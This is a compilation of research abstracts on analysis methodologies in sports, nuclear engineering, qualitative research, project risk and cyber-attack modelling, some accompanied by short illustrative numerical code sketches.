    Full Text Available High performance modern tennis is characterised by high dynamism, speed in thinking and action, precision, and high technical and tactical skills. In this study, we used direct observation and statistical recording of nine matches over two competition years involving the tennis players Roger Federer, Rafael Nadal and Andre Agassi. In these tennis players, we studied mainly the return of serve, one of the most important shots in tennis, together with the serve, as the first shots in a point. We have chosen the three tennis players because they are the best examples of the return of serve, as shown by the matches recorded and interpreted. The study we have carried out shows that the return of serve makes Agassi a winner in most matches. The high percentage of Federer's serves makes his adversaries have a lower percentage in return of serve, which prevents them from winning against his serve. A high percentage in return of serve results in more points on the adversary's serve and an opportunity to start the offensive point. After comparing the three tennis players mentioned above, we can see that the highest percentage of points won on return of serve belongs to Agassi, which ranks him among the best return-of-serve tennis players in the world. The tennis player with the highest percentage in return of serve is the one who wins the match, which shows, once again, the importance of the return of serve. Return of serve can be a strong counter-attack weapon if used at its highest level.

  2. Snapshot analysis for rhodium fixed incore detector using BEACON methodology

    International Nuclear Information System (INIS)

    Cha, Kyoon Ho; Choi, Yu Sun; Lee, Eun Ki; Park, Moon Ghu; Morita, Toshio; Heibel, Michael D.

    2004-01-01

    The purpose of this report is to process the rhodium detector data of the Yonggwang nuclear unit 4 cycle 5 core for the measured power distribution by using the BEACON methodology. Rhodium snapshots of YGN 4 cycle 5 have been analyzed by both BEACON/SPINOVA and CECOR to compare the results of the two codes, based on a large number of snapshots obtained during normal plant operation. Reviewing the results of this analysis, BEACON/SPINOVA can be used for the snapshot analysis of Korean Standard Nuclear Power (KSNP) plants.

  3. Interpretive Phenomenological Analysis: An Appropriate Methodology for Educational Research?

    Directory of Open Access Journals (Sweden)

    Edward John Noon

    2018-04-01

    Full Text Available Interpretive phenomenological analysis (IPA) is a contemporary qualitative methodology, first developed by psychologist Jonathan Smith (1996). Whilst its roots are in psychology, it is increasingly being drawn upon by scholars in the human, social and health sciences (Charlick, Pincombe, McKellar, & Fielder, 2016). Despite this, IPA has received limited attention across educationalist literature. Drawing upon my experiences of using IPA to explore the barriers to the use of humour in the teaching of Childhood Studies (Noon, 2017), this paper will discuss its theoretical orientation, sampling and methods of data collection and analysis, before examining the strengths and weaknesses of IPA's employment in educational research.

  4. A methodology for uncertainty analysis of reference equations of state

    DEFF Research Database (Denmark)

    Cheung, Howard; Frutiger, Jerome; Bell, Ian H.

    We present a detailed methodology for the uncertainty analysis of reference equations of state (EOS) based on Helmholtz energy. In recent years there has been an increased interest in uncertainties of property data and process models of thermal systems. In the literature there are various...... for uncertainty analysis is suggested as a tool for EOS. The uncertainties of the EOS properties are calculated from the experimental values and the EOS model structure through the parameter covariance matrix and subsequent linear error propagation. This allows reporting the uncertainty range (95% confidence...
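
    The covariance-based error propagation mentioned above amounts to var(y) ≈ J Σ J^T, with J the sensitivities of the property to the fitted parameters and Σ the parameter covariance matrix. The sketch below applies this to a toy polynomial "property model" with made-up parameter values and covariances; it is not a Helmholtz-energy EOS.

```python
import numpy as np

# Toy "equation of state": property y(T) = a + b*T + c*T**2 with fitted parameters.
theta = np.array([1.2, 0.03, -2.0e-5])          # illustrative fitted values a, b, c

# Illustrative parameter covariance matrix from the regression (not real EOS data).
cov_theta = np.array([[ 4.0e-4, -1.0e-6,   2.0e-9],
                      [-1.0e-6,  5.0e-8,  -9.0e-11],
                      [ 2.0e-9, -9.0e-11,  2.0e-13]])

def jacobian(T):
    """Sensitivities of y with respect to (a, b, c) at temperature T."""
    return np.array([1.0, T, T**2])

def property_with_uncertainty(T):
    J = jacobian(T)
    y = J @ theta
    var_y = J @ cov_theta @ J                   # linear error propagation: J Sigma J^T
    return y, 1.96 * np.sqrt(var_y)             # value and approximate 95% half-width

for T in (300.0, 400.0, 500.0):
    y, half_width = property_with_uncertainty(T)
    print(f"T = {T:.0f} K: y = {y:.4f} +/- {half_width:.4f} (95% conf.)")
```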

  5. A methodology for strain-based fatigue reliability analysis

    International Nuclear Information System (INIS)

    Zhao, Y.X.

    2000-01-01

    A significant scatter of the cyclic stress-strain (CSS) responses should be noted for a nuclear reactor material, 1Cr18Ni9Ti pipe-weld metal. The existence of the scatter implies that a random applied cyclic strain history will be introduced under any of the loading modes, even for a deterministic loading history. A non-conservative evaluation might be given in practice without considering the scatter. A methodology for strain-based fatigue reliability analysis, which takes the scatter into account, is developed. The responses are approximately modeled by probability-based CSS curves of the Ramberg-Osgood relation. The strain-life data are modeled, similarly, by probability-based strain-life curves of the Coffin-Manson law. The reliability assessment is constructed by considering the interference of the random applied fatigue strain and capacity histories. Probability density functions of the applied and capacity histories are given analytically. The methodology can be conveniently extrapolated to the case of a deterministic CSS relation, as the existing methods do. The non-conservative evaluation of the deterministic CSS relation and the availability of the present methodology have been indicated by an analysis of the material test results.
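
    The interference formulation described above can be illustrated with a small Monte Carlo sketch: the failure probability is the probability that a randomly scattered applied strain amplitude exceeds a randomly scattered strain capacity. The lognormal parameters below are illustrative only and are not the 1Cr18Ni9Ti pipe-weld data.

```python
import numpy as np

rng = np.random.default_rng(3)
n = 200_000

# Applied cyclic strain amplitude (scatter from the random cyclic stress-strain response).
applied = rng.lognormal(mean=np.log(2.0e-3), sigma=0.15, size=n)

# Strain capacity at the target life from a scattered Coffin-Manson type curve
# (illustrative numbers, not the material data of the record).
capacity = rng.lognormal(mean=np.log(3.0e-3), sigma=0.20, size=n)

# Interference: failure occurs when the applied amplitude exceeds the capacity.
p_failure = np.mean(applied > capacity)
print(f"estimated failure probability: {p_failure:.4f}")
```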

  6. ASSESSMENT OF SEISMIC ANALYSIS METHODOLOGIES FOR DEEPLY EMBEDDED NPP STRUCTURES

    International Nuclear Information System (INIS)

    XU, J.; MILLER, C.; COSTANTINO, C.; HOFMAYER, C.; GRAVES, H. NRC.

    2005-01-01

    Several of the new generation nuclear power plant designs have structural configurations which are proposed to be deeply embedded. Since current seismic analysis methodologies have been applied to shallowly embedded structures (e.g., ASCE 4 suggests that simple formulations may be used to model the embedment effect when the depth of embedment is less than 30% of the foundation radius), the US Nuclear Regulatory Commission is sponsoring a program at the Brookhaven National Laboratory with the objective of investigating the extent to which procedures acceptable for shallow embedment depths are adequate for larger embedment depths. This paper presents the results of a study comparing the response spectra obtained from two of the more popular analysis methods for structural configurations varying from shallow embedment to complete embedment. A typical safety-related structure embedded in a soil profile representative of a typical nuclear power plant site was utilized in the study, and the depths of burial (DOB) considered range from 25% to 100% of the height of the structure. Included in the paper are: (1) the description of a simplified analysis and a detailed approach for the SSI analyses of a structure with various DOBs, (2) the comparison of the analysis results for the different DOBs between the two methods, and (3) the performance assessment of the analysis methodologies for SSI analyses of deeply embedded structures. The resulting assessment from this study indicates that simplified methods may be capable of capturing the seismic response for much more deeply embedded structures than would normally be allowed by standard practice.

  7. Practical In-Depth Analysis of IDS Alerts for Tracing and Identifying Potential Attackers on Darknet

    OpenAIRE

    Jungsuk Song; Younsu Lee; Jang-Won Choi; Joon-Min Gil; Jaekyung Han; Sang-Soo Choi

    2017-01-01

    The darknet (i.e., a set of unused IP addresses) is a very useful solution for observing the global trends of cyber threats and analyzing attack activities on the Internet. Since the darknet is not connected with real systems, in most cases, the incoming packets on the darknet (‘the darknet traffic’) do not contain a payload. This means that we are unable to get real malware from the darknet traffic. This situation makes it difficult for security experts (e.g., academic researchers, engineers...

  8. 3-D rod ejection analysis using a conservative methodology

    Energy Technology Data Exchange (ETDEWEB)

    Park, Min Ho; Park, Jin Woo; Park, Guen Tae; Um, Kil Sup; Ryu, Seok Hee; Lee, Jae Il; Choi, Tong Soo [KEPCO, Daejeon (Korea, Republic of)

    2016-05-15

    The point kinetics model, which simplifies the core phenomena and physical specifications, is used for conventional rod ejection accident analysis. The point kinetics model is convenient for assuming conservative core parameters, but this simplification loses a large amount of safety margin. The CHASER system couples the three-dimensional core neutron kinetics code ASTRA, the sub-channel analysis code THALES and the fuel performance analysis code FROST. The validation study for the CHASER system is addressed using the NEACRP three-dimensional PWR core transient benchmark problem. A series of conservative rod ejection analyses for the APR1400 type plant is performed for both hot full power (HFP) and hot zero power (HZP) conditions to determine the most limiting cases. The conservative rod ejection analysis methodology is designed to properly consider important phenomena and physical parameters.

  9. Methodological challenges in qualitative content analysis: A discussion paper.

    Science.gov (United States)

    Graneheim, Ulla H; Lindgren, Britt-Marie; Lundman, Berit

    2017-09-01

    This discussion paper is aimed to map content analysis in the qualitative paradigm and explore common methodological challenges. We discuss phenomenological descriptions of manifest content and hermeneutical interpretations of latent content. We demonstrate inductive, deductive, and abductive approaches to qualitative content analysis, and elaborate on the level of abstraction and degree of interpretation used in constructing categories, descriptive themes, and themes of meaning. With increased abstraction and interpretation comes an increased challenge to demonstrate the credibility and authenticity of the analysis. A key issue is to show the logic in how categories and themes are abstracted, interpreted, and connected to the aim and to each other. Qualitative content analysis is an autonomous method and can be used at varying levels of abstraction and interpretation. Copyright © 2017 Elsevier Ltd. All rights reserved.

  10. Biomass Thermogravimetric Analysis: Uncertainty Determination Methodology and Sampling Maps Generation

    Science.gov (United States)

    Pazó, Jose A.; Granada, Enrique; Saavedra, Ángeles; Eguía, Pablo; Collazo, Joaquín

    2010-01-01

    The objective of this study was to develop a methodology for the determination of the maximum sampling error and confidence intervals of thermal properties obtained from thermogravimetric analysis (TG), including moisture, volatile matter, fixed carbon and ash content. The sampling procedure of the TG analysis was of particular interest and was conducted with care. The results of the present study were compared to those of a prompt analysis, and a correlation between the mean values and maximum sampling errors of the methods were not observed. In general, low and acceptable levels of uncertainty and error were obtained, demonstrating that the properties evaluated by TG analysis were representative of the overall fuel composition. The accurate determination of the thermal properties of biomass with precise confidence intervals is of particular interest in energetic biomass applications. PMID:20717532
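
    A minimal sketch of the confidence-interval part of such a methodology, assuming replicate TG determinations of a single property: the maximum sampling error is taken as the half-width of a Student's t confidence interval. The replicate values are synthetic.

```python
import numpy as np
from scipy import stats

# Replicate TG determinations of one property (e.g. ash content, wt%) -- synthetic values.
ash = np.array([4.82, 4.95, 4.71, 4.88, 4.79, 4.91])

n = ash.size
mean = ash.mean()
std_err = ash.std(ddof=1) / np.sqrt(n)

# Two-sided 95% confidence interval based on Student's t distribution.
t_crit = stats.t.ppf(0.975, df=n - 1)
max_sampling_error = t_crit * std_err

print(f"ash content: {mean:.2f} wt% +/- {max_sampling_error:.2f} wt% (95% CI, n={n})")
```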

  11. Safety analysis methodologies for radioactive waste repositories in shallow ground

    International Nuclear Information System (INIS)

    1984-01-01

    The report is part of the IAEA Safety Series and is addressed to authorities and specialists responsible for or involved in planning, performing and/or reviewing safety assessments of shallow ground radioactive waste repositories. It discusses approaches that are applicable for the safety analysis of a shallow ground repository. The methodologies, analysis techniques and models described are pertinent to the task of predicting the long-term performance of a shallow ground disposal system. They may be used during the processes of selection, confirmation and licensing of new sites and disposal systems or to evaluate the long-term consequences in the post-sealing phase of existing operating or inactive sites. The analysis may point out the need for remedial action, or provide information to be used in deciding on the duration of surveillance. Safety analyses, both general in nature and specific to a certain repository, site or design concept, are discussed, with emphasis on deterministic and probabilistic studies.

  12. PROTECTION WORKS AGAINST WAVE ATTACKS IN THE HAOR AREAS OF BANGLADESH: ANALYSIS OF SUSTAINABILITY

    Directory of Open Access Journals (Sweden)

    M.K. Alam

    2010-12-01

    Full Text Available Haor is the local name of the saucer-shaped, naturally depressed areas of Bangladesh. There are 414 haors in the northeast region that comprise approximately 17% of the country. These areas are submerged under deep water from July to November due to the overflow of rivers and heavy rainfall, causing them to appear like seas with erosive waves. Recently, wave attack has drastically increased because of de-plantation and changing cropping patterns to allow for more agricultural production. The local people, government and Non-Government Organisations (NGOs) have tried many techniques to protect life and property against wave attacks. A cost comparison shows that Cement Concrete (CC) blocks over geotextile on the embankment slope are a cost-effective, environment-friendly and socially acceptable method to prevent loss of life and property. However, the design rules employed by the engineers are faulty because there is a knowledge gap in the application of wave hydraulics among these professionals. As a result, damage frequently occurs and maintenance costs are increasing. This study explores the sustainability of the CC blocks used in the Haor areas by evaluating two case studies with the verification of available design rules.

  13. Comparative analysis as a basic research orientation: Key methodological problems

    Directory of Open Access Journals (Sweden)

    N P Narbut

    2015-12-01

    Full Text Available To date, the Sociological Laboratory of the Peoples’ Friendship University of Russia has accumulated vast experience in the field of cross-cultural studies, reflected in the publications based on the results of mass surveys conducted in Moscow, Maikop, Beijing, Guangzhou, Prague, Belgrade, and Pristina. However, these publications mainly focus on comparisons of the empirical data rather than on methodological and technical issues; that is why the aim of this article is to identify key problems of comparative analysis in cross-cultural studies that become evident only if you conduct empirical research yourself - from the first step of setting the problem and approving it by all the sides (countries) involved to the last step of interpreting and comparing the data obtained. The authors are sure that no sociologist would ever doubt the necessity and importance of comparative analysis in the broadest sense of the word, but at the same time very few are ready to discuss its key methodological challenges and prefer to ignore them completely. We summarize the problems of comparative analysis in sociology as follows: (1) applying research techniques to the sample in another country - both in translating and adapting them to different social realities and worldviews (in particular, the problematic status of standardization and the qualitative approach); (2) choosing the "right" respondents to question and relevant cases (cultures) to study; (3) designing the research scheme, i.e. justifying the sequence of steps (what should go first - methodology or techniques); (4) accepting the procedures that are correct within one country for cross-cultural work (whether or not that is an appropriate choice).

  14. Analysis of gaming community using Soft System Methodology

    OpenAIRE

    Hurych, Jan

    2015-01-01

    This diploma thesis aims to analyse a virtual gaming community and its problems, in the case of the community belonging to the EU server of the game World of Tanks. To solve these problems, the Soft System Methodology by P. Checkland is used. The thesis includes an analysis of the significance of gaming communities for the gaming industry as a whole. The gaming community is then defined as a soft system. Three problems are analysed in the practical part of the thesis using a newer version of SSM. One iteration of...

  15. A development of containment performance analysis methodology using GOTHIC code

    Energy Technology Data Exchange (ETDEWEB)

    Lee, B. C.; Yoon, J. I. [Future and Challenge Company, Seoul (Korea, Republic of); Byun, C. S.; Lee, J. Y. [Korea Electric Power Research Institute, Taejon (Korea, Republic of); Lee, J. Y. [Seoul National University, Seoul (Korea, Republic of)

    2003-10-01

    Whereas the well-established containment pressure/temperature analysis code CONTEMPT-LT treats the reactor containment as a single volume, this study introduces, as an alternative, the GOTHIC code for use in multi-compartmental containment performance analysis. With the developed GOTHIC methodology, its applicability is verified for containment performance analysis of Korean Nuclear Unit 1. The GOTHIC model for this plant is simply composed of 3 compartments, including the reactor containment and the RWST. In addition, the containment spray system and the containment recirculation system are simulated. As a result of the GOTHIC calculation, under the same assumptions and conditions as those in CONTEMPT-LT, the GOTHIC prediction shows very good results; pressure and temperature transients, including their peaks, are nearly the same. It can be concluded that GOTHIC could provide reasonable containment pressure and temperature responses when considering the inherent conservatism in the CONTEMPT-LT code.

  16. A development of containment performance analysis methodology using GOTHIC code

    International Nuclear Information System (INIS)

    Lee, B. C.; Yoon, J. I.; Byun, C. S.; Lee, J. Y.; Lee, J. Y.

    2003-01-01

    Whereas the well-established containment pressure/temperature analysis code CONTEMPT-LT treats the reactor containment as a single volume, this study introduces, as an alternative, the GOTHIC code for use in multi-compartmental containment performance analysis. With the developed GOTHIC methodology, its applicability is verified for containment performance analysis of Korean Nuclear Unit 1. The GOTHIC model for this plant is simply composed of 3 compartments, including the reactor containment and the RWST. In addition, the containment spray system and the containment recirculation system are simulated. As a result of the GOTHIC calculation, under the same assumptions and conditions as those in CONTEMPT-LT, the GOTHIC prediction shows very good results; pressure and temperature transients, including their peaks, are nearly the same. It can be concluded that GOTHIC could provide reasonable containment pressure and temperature responses when considering the inherent conservatism in the CONTEMPT-LT code.

  17. METHODOLOGY FOR ANALYSIS OF DECISION MAKING IN AIR NAVIGATION SYSTEM

    Directory of Open Access Journals (Sweden)

    Volodymyr Kharchenko

    2011-03-01

    Full Text Available Abstract. In the research of the Air Navigation System as a complex socio-technical system, the methodology of analysis of the human operator's decision-making has been developed. The significance of individual psychological factors, as well as the impact of socio-psychological factors on the professional activities of a human operator during the development of a flight situation from normal to catastrophic, were analyzed. On the basis of the reflexive theory of bipolar choice, the expected risks of decision-making by the Air Navigation System's operator influenced by the external environment, previous experience and intentions were identified. The methods for the analysis of decision-making by the human operator of the Air Navigation System using stochastic networks have been developed. Keywords: Air Navigation System, bipolar choice, human operator, decision-making, expected risk, individual psychological factors, methodology of analysis, reflexive model, socio-psychological factors, stochastic network.

  18. Securing public transportation systems an integrated decision analysis framework for the prevention of terrorist attacks as example

    CERN Document Server

    Brauner, Florian

    2017-01-01

    Florian Brauner addresses the risk reduction effects of security measures (SecMe) as well as economic and social effects, using terrorist threats in public transportation as a use case. SecMe increase the level of security but cause interferences and restrictions for customers (e.g. privacy). This study identifies the interferences and analyzes the acceptance with an empirical survey of customers. A composite indicator for the acceptance of different SecMe is developed and integrated into a risk management framework for multi-criteria decision analysis, achieving the right balance of risk reduction, costs, and social acceptance. Contents: Assessment of Security Measures for Risk Management; Measurement of Objective Effectiveness of Security Measures Against Terrorist Attacks; Determination of Subjective Effects of Security Measures (Customer Acceptance Analysis); Cost Analysis of Security Measures; Multi-Criteria Decision Support Systems. Target Groups: Scientists with Interest in Civil Security Research; Providers and S...

  19. Impact modeling and prediction of attacks on cyber targets

    Science.gov (United States)

    Khalili, Aram; Michalk, Brian; Alford, Lee; Henney, Chris; Gilbert, Logan

    2010-04-01

    In most organizations, IT (information technology) infrastructure exists to support the organization's mission. The threat of cyber attacks poses risks to this mission. Current network security research focuses on the threat of cyber attacks to the organization's IT infrastructure; however, the risks to the overall mission are rarely analyzed or formalized. This connection of IT infrastructure to the organization's mission is often neglected or carried out ad-hoc. Our work bridges this gap and introduces analyses and formalisms to help organizations understand the mission risks they face from cyber attacks. Modeling an organization's mission vulnerability to cyber attacks requires a description of the IT infrastructure (network model), the organization mission (business model), and how the mission relies on IT resources (correlation model). With this information, proper analysis can show which cyber resources are of tactical importance in a cyber attack, i.e., controlling them enables a large range of cyber attacks. Such analysis also reveals which IT resources contribute most to the organization's mission, i.e., lack of control over them gravely affects the mission. These results can then be used to formulate IT security strategies and explore their trade-offs, which leads to better incident response. This paper presents our methodology for encoding IT infrastructure, organization mission and correlations, our analysis framework, as well as initial experimental results and conclusions.
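
    The correlation model described above maps IT resources to mission tasks so that the mission impact of losing a resource can be ranked. The sketch below is a toy version of that idea with invented task names, dependencies and weights; a real model would also capture redundancy and partial degradation.

```python
# Minimal sketch of a "correlation model": mission tasks depend on IT resources,
# and each task carries a weight reflecting its importance to the overall mission.
# Names and weights are illustrative, not taken from the paper.
mission_tasks = {
    "order_processing": {"weight": 0.5, "depends_on": {"db_server", "web_frontend"}},
    "billing":          {"weight": 0.3, "depends_on": {"db_server", "erp_system"}},
    "customer_support": {"weight": 0.2, "depends_on": {"mail_server", "web_frontend"}},
}

def mission_impact(compromised):
    """Fraction of mission weight lost if the given set of resources is unavailable."""
    lost = sum(task["weight"] for task in mission_tasks.values()
               if task["depends_on"] & compromised)
    total = sum(task["weight"] for task in mission_tasks.values())
    return lost / total

all_resources = set().union(*(t["depends_on"] for t in mission_tasks.values()))

# Rank single-resource compromises by how much of the mission they take down.
ranking = sorted(all_resources, key=lambda r: mission_impact({r}), reverse=True)
for resource in ranking:
    print(f"{resource:14s} -> mission impact {mission_impact({resource}):.2f}")
```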

  20. A powerful methodology for reactor vessel pressurized thermal shock analysis

    International Nuclear Information System (INIS)

    Boucau, J.; Mager, T.

    1994-01-01

    The recent operating experience of the Pressurized Water Reactor (PWR) industry has focused increasing attention on the issue of reactor vessel pressurized thermal shock (PTS). More specifically, the review of the old WWER-type reactors (WWER 440/230) has indicated sensitivity to neutron embrittlement. This has already led to some remedial actions, including safety injection water preheating or vessel annealing. Such measures are usually taken based on the analysis of a selected number of conservative PTS events. Consideration of all postulated cooldown events would draw attention to the impact of operator action and control system effects on reactor vessel PTS. Westinghouse has developed a methodology which couples event sequence analysis with probabilistic fracture mechanics analyses to identify those events that are of primary concern for reactor vessel integrity. Operating experience is utilized to aid in defining the appropriate event sequences and event frequencies of occurrence for the evaluation. Once the event sequences of concern are identified, detailed deterministic thermal-hydraulic and structural evaluations can be performed to determine the conditions required to minimize the extension of postulated flaws or enhance flaw arrest in the reactor vessel. The results of these analyses can then be used to better define further modifications in vessel and plant system design and to operating procedures. The purpose of the present paper will be to describe this methodology and to show its benefits for decision making. (author). 1 ref., 3 figs

  1. Development of a heat exchanger root-cause analysis methodology

    International Nuclear Information System (INIS)

    Jarrel, D.B.

    1989-01-01

    The objective of this work is to determine a generic methodology for approaching the accurate identification of the root cause of component failure. Root-cause determinations are an everyday challenge to plant personnel, but they are handled with widely differing degrees of success due to the approaches, levels of diagnostic expertise, and documentation. The criterion for success is simple: If the root cause of the failure has truly been determined and corrected, the same causal failure relationship will not be demonstrated again in the future. The approach to root-cause analysis (RCA) element definition was to first selectively choose and constrain a functionally significant component (in this case a component cooling water to service water heat exchanger) that has demonstrated prevalent failures. Then a root cause of failure analysis was performed by a systems engineer on a large number of actual failure scenarios. The analytical process used by the engineer was documented and evaluated to abstract the logic model used to arrive at the root cause. For the case of the heat exchanger, the actual root-cause diagnostic approach is described. A generic methodology for the solution of the root cause of component failure is demonstrable for this general heat exchanger sample

  2. APPROPRIATE ALLOCATION OF CONTINGENCY USING RISK ANALYSIS METHODOLOGY

    Directory of Open Access Journals (Sweden)

    Andi Andi

    2004-01-01

    Full Text Available Many cost overruns in the world of construction are attributable to either unforeseen events or foreseen events for which uncertainty was not appropriately accommodated. It is argued that a significant improvement to project management performance may result from greater attention to the process of analyzing project risks. The objective of this paper is to propose a risk analysis methodology for appropriate allocation of contingency in project cost estimation. In the first step, project risks will be identified. Influence diagramming technique is employed to identify and to show how the risks affect the project cost elements and also the relationships among the risks themselves. The second step is to assess the project costs with regards to the risks under consideration. Using a linguistic approach, the degree of uncertainty of identified project risks is assessed and quantified. The problem of dependency between risks is taken into consideration during this analysis. For the final step, as the main purpose of this paper, a method for allocating appropriate contingency is presented. Two types of contingencies, i.e. project contingency and management reserve are proposed to accommodate the risks. An illustrative example is presented at the end to show the application of the methodology.
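
    As a quantitative counterpart to the methodology outlined above, a common way to size the two contingency types is to simulate risk-adjusted project cost and read contingency and management reserve off chosen percentiles. The sketch below uses a probabilistic risk register with invented probabilities and triangular impacts; it is a simplified stand-in for the paper's influence-diagram and linguistic assessment approach.

```python
import numpy as np

rng = np.random.default_rng(11)
n = 100_000

base_estimate = 10_000_000.0          # base project cost, currency units (illustrative)

# Illustrative risk register: probability of occurrence and triangular impact (min, mode, max).
risks = [
    {"p": 0.30, "impact": (100_000, 250_000, 600_000)},    # e.g. ground conditions
    {"p": 0.15, "impact": (200_000, 500_000, 1_200_000)},  # e.g. design change
    {"p": 0.50, "impact": (50_000, 120_000, 300_000)},     # e.g. material price escalation
]

total_risk_cost = np.zeros(n)
for risk in risks:
    occurs = rng.random(n) < risk["p"]
    impact = rng.triangular(*risk["impact"], size=n)
    total_risk_cost += occurs * impact

cost = base_estimate + total_risk_cost
project_contingency = np.percentile(cost, 80) - base_estimate    # owner's chosen confidence level
management_reserve = np.percentile(cost, 95) - np.percentile(cost, 80)

print(f"project contingency (to P80): {project_contingency:,.0f}")
print(f"management reserve (P80 to P95): {management_reserve:,.0f}")
```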

  3. The political attack ad

    Directory of Open Access Journals (Sweden)

    Palma Peña-Jiménez, Ph.D.

    2011-01-01

    Full Text Available During election campaigns the political spot has a clear objective: to win votes. This message is communicated to the electorate through television and Internet, and usually presents a negative approach, which includes a direct critical message against the opponent, rather than an exposition of proposals. This article is focused on the analysis of the campaign attack video ad purposely created to encourage the disapproval of the political opponent among voters. These ads focus on discrediting the opponent, many times, through the transmission of ad hominem messages, instead of disseminating the potential of the political party and the virtues and manifesto of its candidate. The article reviews the development of the attack ad since its first appearance, which in Spain dates back to 1996, when the famous Doberman ad was broadcast, and examines the most memorable campaign attack ads.

  4. Validating analysis methodologies used in burnup credit criticality calculations

    International Nuclear Information System (INIS)

    Brady, M.C.; Napolitano, D.G.

    1992-01-01

    The concept of allowing reactivity credit for the depleted (or burned) state of pressurized water reactor fuel in the licensing of spent fuel facilities introduces a new challenge to members of the nuclear criticality community. The primary difference in this analysis approach is the technical ability to calculate spent fuel compositions (or inventories) and to predict their effect on the system multiplication factor. Isotopic prediction codes are used routinely for in-core physics calculations and the prediction of radiation source terms for both thermal and shielding analyses, but represent an innovation for criticality specialists. This paper discusses two methodologies currently being developed to specifically evaluate isotopic composition and reactivity for the burnup credit concept. A comprehensive approach to benchmarking and validating the methods is also presented. This approach involves the analysis of commercial reactor critical data, fuel storage critical experiments, chemical assay isotopic data, and numerical benchmark calculations

  5. CONTENT ANALYSIS IN PROJECT MANAGEMENT: PROPOSALOF A METHODOLOGICAL FRAMEWORK

    Directory of Open Access Journals (Sweden)

    Alessandro Prudêncio Lukosevicius

    2016-12-01

    Full Text Available Content analysis (CA) is a popular approach among researchers from different areas, but it is still incipient in project management (PM). However, the volume of usage apparently does not translate into application quality. The method receives constant criticism about the scientific rigor adopted, especially when led by junior researchers. This article proposes a methodological framework for CA and investigates the use of CA in PM research. To accomplish this goal, a systematic literature review is combined with CA of 23 articles from the EBSCO database covering the last 20 years (1996-2016). The findings show that the proposed framework can help researchers better apply CA and suggest that the use of the method, in terms of both quantity and quality, should be expanded in PM research. In addition to the framework, another contribution of this research is an analysis of the use of CA in PM in the last 20 years.

  6. Computer Network Operations Methodology

    Science.gov (United States)

    2004-03-01

    means of their computer information systems. Disrupt - This type of attack focuses on disrupting as “attackers might surreptitiously reprogram enemy...by reprogramming the computers that control distribution within the power grid. A disruption attack introduces disorder and inhibits the effective...between commanders. The use of methodologies is widespread and done subconsciously to assist individuals in decision making. The processes that

  7. Application of survival analysis methodology to the quantitative analysis of LC-MS proteomics data

    KAUST Repository

    Tekwe, C. D.; Carroll, R. J.; Dabney, A. R.

    2012-01-01

    positive, skewed and often left-censored, we propose using survival methodology to carry out differential expression analysis of proteins. Various standard statistical techniques including non-parametric tests such as the Kolmogorov-Smirnov and Wilcoxon

  8. Calculating Adversarial Risk from Attack Trees: Control Strength and Probabilistic Attackers

    NARCIS (Netherlands)

    Pieters, Wolter; Davarynejad, Mohsen

    2015-01-01

    Attack trees are a well-known formalism for quantitative analysis of cyber attacks consisting of multiple steps and alternative paths. It is possible to derive properties of the overall attacks from properties of individual steps, such as cost for the attacker and probability of success. However, in
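
    A minimal sketch of deriving overall attack properties from individual steps, as described above: leaves carry attacker cost and success probability, AND nodes add costs and multiply probabilities, and OR nodes are resolved here by letting the attacker pick the cheapest branch (one common convention among several). The tree and the numbers are invented.

```python
import math
from dataclasses import dataclass, field

@dataclass
class Node:
    name: str
    gate: str = "LEAF"            # "LEAF", "AND" or "OR"
    cost: float = 0.0             # attacker cost (leaves only), arbitrary units
    prob: float = 1.0             # probability of success (leaves only)
    children: list = field(default_factory=list)

def evaluate(node):
    """Return (cost, success probability) for the attack rooted at this node.

    AND: all child steps are needed, so costs add and probabilities multiply.
    OR : the attacker takes the cheapest alternative (one common convention).
    """
    if node.gate == "LEAF":
        return node.cost, node.prob
    results = [evaluate(child) for child in node.children]
    if node.gate == "AND":
        return sum(c for c, _ in results), math.prod(p for _, p in results)
    return min(results, key=lambda r: r[0])

# Illustrative tree: a two-step technical path versus bribing an insider.
tree = Node("compromise account", "OR", children=[
    Node("technical path", "AND", children=[
        Node("phish password", cost=100, prob=0.4),
        Node("bypass 2FA", cost=400, prob=0.3),
    ]),
    Node("bribe insider", cost=2000, prob=0.6),
])

cost, prob = evaluate(tree)
print(f"cheapest overall attack: cost = {cost}, success probability = {prob:.2f}")
```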

  9. A Game Theoretic Approach to Cyber Attack Prediction

    Energy Technology Data Exchange (ETDEWEB)

    Peng Liu

    2005-11-28

    The area investigated by this project is cyber attack prediction. With a focus on correlation-based prediction, current attack prediction methodologies overlook the strategic nature of cyber attack-defense scenarios. As a result, current cyber attack prediction methodologies are very limited in predicting strategic behaviors of attackers in enforcing nontrivial cyber attacks such as DDoS attacks, and may result in low accuracy in correlation-based predictions. This project develops a game theoretic framework for cyber attack prediction, where an automatic game-theory-based attack prediction method is proposed. Being able to quantitatively predict the likelihood of (sequences of) attack actions, our attack prediction methodology can predict fine-grained strategic behaviors of attackers and may greatly improve the accuracy of correlation-based prediction. To our best knowledge, this project develops the first comprehensive framework for incentive-based modeling and inference of attack intent, objectives, and strategies; and this project develops the first method that can predict fine-grained strategic behaviors of attackers. The significance of this research and the benefit to the public can be demonstrated to certain extent by (a) the severe threat of cyber attacks to the critical infrastructures of the nation, including many infrastructures overseen by the Department of Energy, (b) the importance of cyber security to critical infrastructure protection, and (c) the importance of cyber attack prediction to achieving cyber security.
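
    The following sketch illustrates the game-theoretic flavour of such prediction, not the project's actual framework: a small zero-sum attacker-defender matrix game is solved approximately by fictitious play, and the attacker's empirical mixed strategy is read as a prediction of which attack actions are most likely. The payoff values are invented.

```python
import numpy as np

# Illustrative zero-sum payoff matrix: rows = attacker actions, columns = defender actions.
# Each entry is the attacker's payoff (the defender's loss); numbers are made up.
payoff = np.array([
    [3.0, 1.0, 0.5],   # DDoS
    [1.0, 4.0, 0.5],   # SQL injection
    [2.0, 2.0, 1.5],   # phishing
])
attacks = ["DDoS", "SQL injection", "phishing"]

# Fictitious play: each side best-responds to the opponent's empirical action frequencies.
a_counts = np.ones(payoff.shape[0])
d_counts = np.ones(payoff.shape[1])
for _ in range(20_000):
    a_best = np.argmax(payoff @ (d_counts / d_counts.sum()))      # attacker best response
    d_best = np.argmin((a_counts / a_counts.sum()) @ payoff)      # defender best response
    a_counts[a_best] += 1
    d_counts[d_best] += 1

attacker_mix = a_counts / a_counts.sum()
for name, p in zip(attacks, attacker_mix):
    print(f"predicted frequency of {name:14s}: {p:.2f}")
```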

  10. Proposal of methodology of tsunami accident sequence analysis induced by earthquake using DQFM methodology

    International Nuclear Information System (INIS)

    Muta, Hitoshi; Muramatsu, Ken

    2017-01-01

